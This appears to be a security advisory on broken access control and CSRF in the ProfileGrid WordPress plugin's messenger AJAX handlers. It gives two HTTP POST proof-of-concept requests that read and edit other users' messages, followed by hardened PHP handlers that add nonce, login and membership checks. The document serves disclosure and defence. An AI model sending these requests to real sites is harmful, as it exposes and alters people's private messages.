The plugin was affected by Broken Access Control and Cross-Site Request Forgery (CSRF) vulnerabilities.

The plugin provides frontend user profiles, groups, communities and a messenger. The messenger's AJAX handlers, however, perform no user authentication, so the vulnerability allows an attacker to list and modify other users' messages.

Proof of Concept

To list other users’ messages:

POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_show_messages&tid=1

To edit another user’s message:

POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_send_new_message&tid=1&rid=-&mid=1&content=message1%20from%20user1%20to%20user2%20(edited%20by%20spy)&_wpnonce=b5faed947c
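For comparison, the following is an added illustration (not the plugin's own code) of how the two admin-ajax actions above would look with the missing checks in place: a verified nonce against CSRF, a login requirement, and a per-thread participant check so that a caller can only read threads they belong to and only edit messages they sent. The guard function, the `_hardened` handler names and the two database tables are hypothetical; the action names and the tid, mid, content and _wpnonce request fields are the ones from the proof of concept.

```php
<?php
// Added illustration of a hardened admin-ajax handler pair; not the plugin's own code.
// Assumes hypothetical tables {prefix}pm_thread_members(thread_id, user_id) and
// {prefix}pm_messages(id, thread_id, sender_id, content).
// Shared guard: nonce (CSRF), login (authentication), thread membership (authorization).
function pm_messenger_guard( string $action ): array {
    check_ajax_referer( $action, '_wpnonce' ); // dies with -1 on a missing or bad nonce
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'login required', 401 ); // terminates the request
    }
    global $wpdb;
    $thread_id = absint( $_POST['tid'] ?? 0 );
    $user_id   = get_current_user_id();
    $member    = $wpdb->get_var( $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}pm_thread_members WHERE thread_id = %d AND user_id = %d",
        $thread_id, $user_id ) );
    if ( (int) $member === 0 ) { // the check whose absence exposes every thread by tid
        wp_send_json_error( 'not a participant of this thread', 403 );
    }
    return array( $thread_id, $user_id );
}
// Registered under wp_ajax_ only: with no wp_ajax_nopriv_ twin, WordPress answers
// unauthenticated admin-ajax.php calls with "0" before the handler runs.
add_action( 'wp_ajax_pm_messenger_show_messages', 'pm_messenger_show_messages_hardened' );
add_action( 'wp_ajax_pm_messenger_send_new_message', 'pm_messenger_send_new_message_hardened' );

function pm_messenger_show_messages_hardened() {
    list( $thread_id ) = pm_messenger_guard( 'pm_messenger_show_messages' );
    global $wpdb;
    $rows = $wpdb->get_results( $wpdb->prepare(
        "SELECT id, sender_id, content FROM {$wpdb->prefix}pm_messages WHERE thread_id = %d ORDER BY id",
        $thread_id ), ARRAY_A );
    wp_send_json_success( $rows );
}

function pm_messenger_send_new_message_hardened() {
    list( $thread_id, $user_id ) = pm_messenger_guard( 'pm_messenger_send_new_message' );
    global $wpdb;
    $content = sanitize_textarea_field( wp_unslash( $_POST['content'] ?? '' ) );
    $mid     = absint( $_POST['mid'] ?? 0 );
    if ( $mid > 0 ) { // edit: the row must belong to this thread AND be the caller's own
        $ok = $wpdb->update( $wpdb->prefix . 'pm_messages', array( 'content' => $content ),
            array( 'id' => $mid, 'thread_id' => $thread_id, 'sender_id' => $user_id ),
            array( '%s' ), array( '%d', '%d', '%d' ) );
        if ( ! $ok ) { wp_send_json_error( 'message not found or not yours', 403 ); }
    } else { // new message: sender is always the authenticated caller, never a request field
        $wpdb->insert( $wpdb->prefix . 'pm_messages',
            array( 'thread_id' => $thread_id, 'sender_id' => $user_id, 'content' => $content ),
            array( '%d', '%d', '%s' ) );
    }
    wp_send_json_success();
}
```

With these checks, both proof-of-concept requests fail at the nonce or participant check instead of returning or altering another user's thread.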